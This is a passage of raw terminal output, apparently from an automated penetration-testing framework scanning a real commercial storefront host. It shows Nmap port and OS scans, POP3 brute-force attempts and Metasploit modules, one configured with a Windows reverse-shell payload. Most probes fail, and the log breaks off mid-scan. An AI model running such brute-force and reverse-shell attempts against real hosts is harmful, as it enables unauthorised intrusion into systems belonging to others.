Completed Parallel DNS resolution of 1 host. at 14:31, 0.14s elapsed
NSE: Script scanning 151.101.194.137.
Initiating NSE at 14:31
Completed NSE at 14:31, 16.01s elapsed
Initiating NSE at 14:31
Completed NSE at 14:31, 1.11s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.194.137)
Host is up (0.10s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.2.137 151.101.66.137 151.101.130.137 2a04:4e42:200::649 2a04:4e42:400::649 2a04:4e42:600::649 2a04:4e42::649
PORT STATE SERVICE VERSION
53/tcp open domain?
| dns-nsec-enum:
|_ No NSEC records found
|_dns-fuzz: Server didn't response to our probe, can't fuzz
| dns-nsec3-enum:
|_ DNSSEC NSEC3 not supported
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 - 5.3 (88%), Linux 5.4 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 4.816 days (since Wed Feb 16 18:57:10 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Host script results:
| dns-brute:
|_ DNS Brute-force hostnames: No results.
| dns-blacklist:
| PROXY
| misc.dnsbl.sorbs.net - FAIL
| SPAM
| l2.apews.org - FAIL
|_ list.quorum.to - FAIL
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 146.98 ms 151.101.194.137
NSE: Script Post-scanning.
Initiating NSE at 14:31
Completed NSE at 14:31, 0.00s elapsed
Initiating NSE at 14:31
Completed NSE at 14:31, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 181.04 seconds
Raw packets sent: 67 (6.368KB) | Rcvd: 36 (2.284KB)
+ -- --=[Port 67 closed... skipping.
+ -- --=[Port 68 closed... skipping.
+ -- --=[Port 69 closed... skipping.
+ -- --=[Port 79 opened... running tests...
====================================================================================•x[2022-02-21](14:31)x•
RUNNING NMAP SCRIPTS
====================================================================================•x[2022-02-21](14:31)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 14:31 EST
NSE: Loaded 47 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:31
Completed NSE at 14:31, 0.00s elapsed
Initiating NSE at 14:31
Completed NSE at 14:31, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:31
Completed Parallel DNS resolution of 1 host. at 14:31, 0.08s elapsed
Initiating SYN Stealth Scan at 14:31
Scanning guestmob.myspreadshop.com (151.101.194.137) [1 port]
Discovered open port 79/tcp on 151.101.194.137
Completed SYN Stealth Scan at 14:31, 0.10s elapsed (1 total ports)
Initiating Service scan at 14:31
Scanning 1 service on guestmob.myspreadshop.com (151.101.194.137)
Completed Service scan at 14:34, 158.20s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.194.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.194.137)
Initiating Traceroute at 14:34
Completed Traceroute at 14:34, 0.15s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:34
Completed Parallel DNS resolution of 1 host. at 14:34, 0.08s elapsed
NSE: Script scanning 151.101.194.137.
Initiating NSE at 14:34
Completed NSE at 14:34, 10.63s elapsed
Initiating NSE at 14:34
Completed NSE at 14:34, 1.08s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.194.137)
Host is up (0.10s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.2.137 151.101.66.137 151.101.130.137 2a04:4e42::649 2a04:4e42:200::649 2a04:4e42:400::649 2a04:4e42:600::649
PORT STATE SERVICE VERSION
79/tcp open finger?
|_finger: ERROR: Script execution failed (use -d to debug)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 - 5.3 (89%), Linux 5.4 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 4.818 days (since Wed Feb 16 18:57:11 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE (using port 79/tcp)
HOP RTT ADDRESS
1 143.52 ms 151.101.194.137
NSE: Script Post-scanning.
Initiating NSE at 14:34
Completed NSE at 14:34, 0.00s elapsed
Initiating NSE at 14:34
Completed NSE at 14:34, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 175.18 seconds
Raw packets sent: 67 (6.368KB) | Rcvd: 37 (2.382KB)
+ -- --=[Port 110 opened... running tests...
====================================================================================•x[2022-02-21](14:34)x•
RUNNING NMAP SCRIPTS
====================================================================================•x[2022-02-21](14:34)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 14:34 EST
NSE: Loaded 49 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:34
Completed NSE at 14:34, 0.00s elapsed
Initiating NSE at 14:34
Completed NSE at 14:34, 0.00s elapsed
Initiating Ping Scan at 14:34
Scanning guestmob.myspreadshop.com (151.101.2.137) [4 ports]
Completed Ping Scan at 14:34, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:34
Completed Parallel DNS resolution of 1 host. at 14:34, 0.07s elapsed
Initiating SYN Stealth Scan at 14:34
Scanning guestmob.myspreadshop.com (151.101.2.137) [1 port]
Discovered open port 110/tcp on 151.101.2.137
Completed SYN Stealth Scan at 14:34, 0.09s elapsed (1 total ports)
Initiating Service scan at 14:34
Scanning 1 service on guestmob.myspreadshop.com (151.101.2.137)
Completed Service scan at 14:37, 158.63s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.2.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.2.137)
Initiating Traceroute at 14:37
Completed Traceroute at 14:37, 0.13s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:37
Completed Parallel DNS resolution of 1 host. at 14:37, 0.06s elapsed
NSE: Script scanning 151.101.2.137.
Initiating NSE at 14:37
Completed NSE at 14:37, 25.65s elapsed
Initiating NSE at 14:37
Completed NSE at 14:37, 1.07s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.2.137)
Host is up (0.093s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.66.137 151.101.130.137 151.101.194.137 2a04:4e42::649 2a04:4e42:200::649 2a04:4e42:400::649 2a04:4e42:600::649
PORT STATE SERVICE VERSION
110/tcp open pop3?
| pop3-brute:
| Accounts: No valid accounts found
| Statistics: Performed 5 guesses in 26 seconds, average tps: 0.2
|_ ERROR: Failed to connect.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 - 5.3 (89%), Linux 5.4 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 10.835 days (since Thu Feb 10 18:35:31 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE (using port 110/tcp)
HOP RTT ADDRESS
1 124.82 ms 151.101.2.137
NSE: Script Post-scanning.
Initiating NSE at 14:37
Completed NSE at 14:37, 0.00s elapsed
Initiating NSE at 14:37
Completed NSE at 14:37, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.51 seconds
Raw packets sent: 71 (6.520KB) | Rcvd: 37 (2.312KB)
+ -- --=[Port 111 opened... running tests...
====================================================================================•x[2022-02-21](14:37)x•
RUNNING METASPLOIT MODULES
====================================================================================•x[2022-02-21](14:37)x•
RHOSTS => guestmob.myspreadshop.com
LHOST => 127.0.0.1
LPORT => 4444
[*] guestmob.myspreadshop.com:111 - Scanned 1 of 8 hosts (12% complete)
[*] guestmob.myspreadshop.com:111 - Scanned 2 of 8 hosts (25% complete)
[*] guestmob.myspreadshop.com:111 - Scanned 3 of 8 hosts (37% complete)
[*] guestmob.myspreadshop.com:111 - Scanned 4 of 8 hosts (50% complete)
[*] guestmob.myspreadshop.com:111 - Scanned 5 of 8 hosts (62% complete)
[*] guestmob.myspreadshop.com:111 - Scanned 6 of 8 hosts (75% complete)
[*] guestmob.myspreadshop.com:111 - Scanned 7 of 8 hosts (87% complete)
[*] guestmob.myspreadshop.com:111 - Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
====================================================================================•x[2022-02-21](14:38)x•
RUNNING SHOW MOUNT
====================================================================================•x[2022-02-21](14:38)x•
clnt_create: RPC: Unable to send
clnt_create: RPC: Unable to send
clnt_create: RPC: Unable to send
+ -- --=[Port 123 closed... skipping.
+ -- --=[Port 135 opened... running tests...
====================================================================================•x[2022-02-21](14:42)x•
RUNNING RPCINFO
====================================================================================•x[2022-02-21](14:42)x•
guestmob.myspreadshop.com: RPC: Unable to receive
====================================================================================•x[2022-02-21](14:42)x•
RUNNING NMAP SCRIPTS
====================================================================================•x[2022-02-21](14:42)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 14:42 EST
NSE: Loaded 48 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:42
Completed NSE at 14:42, 0.00s elapsed
Initiating NSE at 14:42
Completed NSE at 14:42, 0.00s elapsed
Initiating Ping Scan at 14:42
Scanning guestmob.myspreadshop.com (151.101.130.137) [4 ports]
Completed Ping Scan at 14:42, 0.12s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:42
Completed Parallel DNS resolution of 1 host. at 14:42, 0.26s elapsed
Initiating SYN Stealth Scan at 14:42
Scanning guestmob.myspreadshop.com (151.101.130.137) [1 port]
Discovered open port 135/tcp on 151.101.130.137
Completed SYN Stealth Scan at 14:42, 0.13s elapsed (1 total ports)
Initiating Service scan at 14:42
Scanning 1 service on guestmob.myspreadshop.com (151.101.130.137)
Completed Service scan at 14:45, 159.13s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.130.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.130.137)
Initiating Traceroute at 14:45
Completed Traceroute at 14:45, 0.16s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:45
Completed Parallel DNS resolution of 1 host. at 14:45, 0.10s elapsed
NSE: Script scanning 151.101.130.137.
Initiating NSE at 14:45
Completed NSE at 14:45, 0.01s elapsed
Initiating NSE at 14:45
Completed NSE at 14:45, 1.11s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.130.137)
Host is up (0.12s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.194.137 151.101.2.137 151.101.66.137 2a04:4e42:200::649 2a04:4e42:400::649 2a04:4e42:600::649 2a04:4e42::649
PORT STATE SERVICE VERSION
135/tcp open msrpc?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.3 - 5.4 (90%), Linux 5.0 (89%), Linux 5.0 - 5.4 (89%), Linux 2.6.32 (89%), Linux 5.0 - 5.3 (88%), Linux 5.4 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 27.489 days (since Tue Jan 25 03:01:21 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 162.56 ms 151.101.130.137
NSE: Script Post-scanning.
Initiating NSE at 14:45
Completed NSE at 14:45, 0.00s elapsed
Initiating NSE at 14:45
Completed NSE at 14:45, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 166.33 seconds
Raw packets sent: 77 (7.498KB) | Rcvd: 42 (3.128KB)
====================================================================================•x[2022-02-21](14:45)x•
RUNNING METASPLOIT MODULES
====================================================================================•x[2022-02-21](14:45)x•
[*] Using configured payload windows/shell/reverse_tcp
RHOST => guestmob.myspreadshop.com
LHOST => 127.0.0.1
LPORT => 4444
[-] Msf::OptionValidateError The following options failed to validate: RHOSTS
+ -- --=[Port 137 closed... skipping.
+ -- --=[Port 139 closed... skipping.
+ -- --=[Port 161 closed... skipping.
+ -- --=[Port 162 opened... running tests...
====================================================================================•x[2022-02-21](14:45)x•
RUNNING NMAP SCRIPTS
====================================================================================•x[2022-02-21](14:45)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 14:45 EST
NSE: Loaded 56 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:45
Completed NSE at 14:45, 0.00s elapsed
Initiating NSE at 14:45
Completed NSE at 14:45, 0.00s elapsed
Initiating Ping Scan at 14:45
Scanning guestmob.myspreadshop.com (151.101.2.137) [4 ports]
Completed Ping Scan at 14:45, 0.12s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:45
Completed Parallel DNS resolution of 1 host. at 14:45, 0.08s elapsed
Initiating UDP Scan at 14:45
Scanning guestmob.myspreadshop.com (151.101.2.137) [1 port]
Completed UDP Scan at 14:45, 0.92s elapsed (1 total ports)
Initiating Connect Scan at 14:45
Scanning guestmob.myspreadshop.com (151.101.2.137) [1 port]
Discovered open port 162/tcp on 151.101.2.137
Completed Connect Scan at 14:45, 0.08s elapsed (1 total ports)
Initiating Service scan at 14:45
Scanning 2 services on guestmob.myspreadshop.com (151.101.2.137)
Service scan Timing: About 50.00% done; ETC: 14:48 (0:01:38 remaining)
Completed Service scan at 14:48, 160.01s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.2.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.2.137)
Initiating Traceroute at 14:48
Completed Traceroute at 14:48, 2.13s elapsed
Initiating Parallel DNS resolution of 8 hosts. at 14:48
Completed Parallel DNS resolution of 8 hosts. at 14:48, 0.51s elapsed
NSE: Script scanning 151.101.2.137.
Initiating NSE at 14:48
Completed NSE at 14:48, 0.02s elapsed
Initiating NSE at 14:48
Completed NSE at 14:48, 1.14s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.2.137)
Host is up (0.11s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.66.137 151.101.130.137 151.101.194.137 2a04:4e42:400::649 2a04:4e42:600::649 2a04:4e42::649 2a04:4e42:200::649
PORT STATE SERVICE VERSION
162/tcp open snmptrap?
162/udp open|filtered snmptrap
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.4 (90%), Linux 5.3 - 5.4 (89%), Linux 2.6.32 (89%), Linux 5.0 (88%), Linux 5.0 - 5.3 (88%), Linux 5.0 - 5.4 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 7.190 days (since Mon Feb 14 10:15:00 2022)
Network Distance: 8 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 85.01 ms 10.83.0.1
2 130.04 ms vlan184.as16.lax1.us.m247.com (45.89.173.193)
3 156.57 ms 217.138.223.96
4 153.32 ms te-3-1-0.bb1.lax1.us.m247.com (82.102.29.112)
5 153.38 ms las-b21-link.ip.twelve99.net (195.12.254.138)
6 119.10 ms las-b23-link.ip.twelve99.net (62.115.125.192)
7 119.05 ms fastly-svc071911-ic358827.ip.twelve99-cust.net (62.115.164.181)
8 119.01 ms 151.101.2.137
NSE: Script Post-scanning.
Initiating NSE at 14:48
Completed NSE at 14:48, 0.00s elapsed
Initiating NSE at 14:48
Completed NSE at 14:48, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.76 seconds
Raw packets sent: 93 (7.882KB) | Rcvd: 46 (3.642KB)
====================================================================================•x[2022-02-21](14:48)x•
RUNNING METASPLOIT MODULES
====================================================================================•x[2022-02-21](14:48)x•
RHOSTS => guestmob.myspreadshop.com
[-] 151.101.66.137 SNMP request timeout.
[*] Scanned 1 of 8 hosts (12% complete)
[-] 151.101.130.137 SNMP request timeout.
[*] Scanned 2 of 8 hosts (25% complete)
[-] 151.101.194.137 SNMP request timeout.
[*] Scanned 3 of 8 hosts (37% complete)
[-] 151.101.2.137 SNMP request timeout.
[*] Scanned 4 of 8 hosts (50% complete)
[-] 2a04:4e42::649 Connection refused.
[*] Scanned 5 of 8 hosts (62% complete)
[-] 2a04:4e42:200::649 Connection refused.
[*] Scanned 6 of 8 hosts (75% complete)
[-] 2a04:4e42:400::649 Connection refused.
[*] Scanned 7 of 8 hosts (87% complete)
[-] 2a04:4e42:600::649 Connection refused.
[*] Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
+ -- --=[Port 264 opened... running tests...
====================================================================================•x[2022-02-21](14:48)x•
RUNNING METASPLOIT MODULES
====================================================================================•x[2022-02-21](14:48)x•
RHOSTS => guestmob.myspreadshop.com
[*] Running module against 151.101.2.137
[*] 151.101.2.137:264 - Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[-] 151.101.2.137:264 - Unexpected response: 'nil'
[*] Running module against 151.101.66.137
[*] 151.101.66.137:264 - Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[-] 151.101.66.137:264 - Unexpected response: 'nil'
[*] Running module against 151.101.130.137
[*] 151.101.130.137:264 - Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[-] 151.101.130.137:264 - Unexpected response: 'nil'
[*] Running module against 151.101.194.137
[*] 151.101.194.137:264 - Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[-] 151.101.194.137:264 - Unexpected response: 'nil'
[*] Running module against 2a04:4e42::649
[*] 2a04:4e42::649:264 - Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[-] 2a04:4e42::649:264 - Auxiliary failed: Rex::HostUnreachable The host ([2a04:4e42::649]:264) was unreachable.
[-] 2a04:4e42::649:264 - Call stack:
[-] 2a04:4e42::649:264 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:283:in `rescue in create_by_type'
[-] 2a04:4e42::649:264 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:263:in `create_by_type'
[-] 2a04:4e42::649:264 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:33:in `create'
[-] 2a04:4e42::649:264 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket.rb:51:in `create_param'
[-] 2a04:4e42::649:264 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:37:in `create_param'
[-] 2a04:4e42::649:264 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:28:in `create'
[-] 2a04:4e42::649:264 - /usr/share/metasploit-framework/lib/msf/core/exploit/remote/tcp.rb:101:in `connect'
[-] 2a04:4e42::649:264 - /usr/share/metasploit-framework/modules/auxiliary/gather/checkpoint_hostname.rb:49:in `run'
[*] Running module against 2a04:4e42:200::649
[*] 2a04:4e42:200::649:264 - Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[-] 2a04:4e42:200::649:264 - Auxiliary failed: Rex::HostUnreachable The host ([2a04:4e42:200::649]:264) was unreachable.
[-] 2a04:4e42:200::649:264 - Call stack:
[-] 2a04:4e42:200::649:264 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:283:in `rescue in create_by_type'
[-] 2a04:4e42:200::649:264 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:263:in `create_by_type'
[-] 2a04:4e42:200::649:264 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:33:in `create'
[-] 2a04:4e42:200::649:264 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket.rb:51:in `create_param'
[-] 2a04:4e42:200::649:264 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:37:in `create_param'
[-] 2a04:4e42:200::649:264 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:28:in `create'
[-] 2a04:4e42:200::649:264 - /usr/share/metasploit-framework/lib/msf/core/exploit/remote/tcp.rb:101:in `connect'
[-] 2a04:4e42:200::649:264 - /usr/share/metasploit-framework/modules/auxiliary/gather/checkpoint_hostname.rb:49:in `run'
[*] Running module against 2a04:4e42:400::649
[*] 2a04:4e42:400::649:264 - Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[-] 2a04:4e42:400::649:264 - Auxiliary failed: Rex::HostUnreachable The host ([2a04:4e42:400::649]:264) was unreachable.
[-] 2a04:4e42:400::649:264 - Call stack:
[-] 2a04:4e42:400::649:264 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:283:in `rescue in create_by_type'
[-] 2a04:4e42:400::649:264 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:263:in `create_by_type'
[-] 2a04:4e42:400::649:264 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:33:in `create'
[-] 2a04:4e42:400::649:264 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket.rb:51:in `create_param'
[-] 2a04:4e42:400::649:264 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:37:in `create_param'
[-] 2a04:4e42:400::649:264 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:28:in `create'
[-] 2a04:4e42:400::649:264 - /usr/share/metasploit-framework/lib/msf/core/exploit/remote/tcp.rb:101:in `connect'
[-] 2a04:4e42:400::649:264 - /usr/share/metasploit-framework/modules/auxiliary/gather/checkpoint_hostname.rb:49:in `run'
[*] Running module against 2a04:4e42:600::649
[*] 2a04:4e42:600::649:264 - Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[-] 2a04:4e42:600::649:264 - Auxiliary failed: Rex::HostUnreachable The host ([2a04:4e42:600::649]:264) was unreachable.
[-] 2a04:4e42:600::649:264 - Call stack:
[-] 2a04:4e42:600::649:264 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:283:in `rescue in create_by_type'
[-] 2a04:4e42:600::649:264 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:263:in `create_by_type'
[-] 2a04:4e42:600::649:264 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:33:in `create'
[-] 2a04:4e42:600::649:264 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket.rb:51:in `create_param'
[-] 2a04:4e42:600::649:264 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:37:in `create_param'
[-] 2a04:4e42:600::649:264 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:28:in `create'
[-] 2a04:4e42:600::649:264 - /usr/share/metasploit-framework/lib/msf/core/exploit/remote/tcp.rb:101:in `connect'
[-] 2a04:4e42:600::649:264 - /usr/share/metasploit-framework/modules/auxiliary/gather/checkpoint_hostname.rb:49:in `run'
[*] Auxiliary module execution completed
+ -- --=[Port 389 closed... skipping.
+ -- --=[Port 445 closed... skipping.
+ -- --=[Port 500 closed... skipping.
+ -- --=[Port 512 opened... running tests...
====================================================================================•x[2022-02-21](14:49)x•
RUNNING NMAP SCRIPTS
====================================================================================•x[2022-02-21](14:49)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 14:49 EST
NSE: Loaded 47 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:49
Completed NSE at 14:49, 0.00s elapsed
Initiating NSE at 14:49
Completed NSE at 14:49, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:49
Completed Parallel DNS resolution of 1 host. at 14:49, 0.09s elapsed
Initiating SYN Stealth Scan at 14:49
Scanning guestmob.myspreadshop.com (151.101.2.137) [1 port]
Discovered open port 512/tcp on 151.101.2.137
Completed SYN Stealth Scan at 14:49, 0.11s elapsed (1 total ports)
Initiating Service scan at 14:49
Scanning 1 service on guestmob.myspreadshop.com (151.101.2.137)
Completed Service scan at 14:52, 159.12s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.2.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.2.137)
Initiating Traceroute at 14:52
Completed Traceroute at 14:52, 0.10s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:52
Completed Parallel DNS resolution of 1 host. at 14:52, 0.09s elapsed
NSE: Script scanning 151.101.2.137.
Initiating NSE at 14:52
Completed NSE at 14:53, 90.59s elapsed
Initiating NSE at 14:53
Completed NSE at 14:53, 1.18s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.2.137)
Host is up (0.086s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.66.137 151.101.130.137 151.101.194.137 2a04:4e42:200::649 2a04:4e42:400::649 2a04:4e42:600::649 2a04:4e42::649
PORT STATE SERVICE VERSION
512/tcp open exec?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 - 5.3 (89%), Linux 5.4 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 10.846 days (since Thu Feb 10 18:35:32 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE (using port 512/tcp)
HOP RTT ADDRESS
1 98.65 ms 151.101.2.137
NSE: Script Post-scanning.
Initiating NSE at 14:53
Completed NSE at 14:53, 0.00s elapsed
Initiating NSE at 14:53
Completed NSE at 14:53, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 256.08 seconds
Raw packets sent: 67 (6.368KB) | Rcvd: 38 (2.427KB)
+ -- --=[Port 513 opened... running tests...
====================================================================================•x[2022-02-21](14:53)x•
RUNNING NMAP SCRIPTS
====================================================================================•x[2022-02-21](14:53)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 14:53 EST
NSE: Loaded 47 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:53
Completed NSE at 14:53, 0.00s elapsed
Initiating NSE at 14:53
Completed NSE at 14:53, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:53
Completed Parallel DNS resolution of 1 host. at 14:53, 0.08s elapsed
Initiating SYN Stealth Scan at 14:53
Scanning guestmob.myspreadshop.com (151.101.66.137) [1 port]
Discovered open port 513/tcp on 151.101.66.137
Completed SYN Stealth Scan at 14:53, 0.09s elapsed (1 total ports)
Initiating Service scan at 14:53
Scanning 1 service on guestmob.myspreadshop.com (151.101.66.137)
Completed Service scan at 14:56, 160.56s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.66.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.66.137)
Initiating Traceroute at 14:56
Completed Traceroute at 14:56, 0.12s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:56
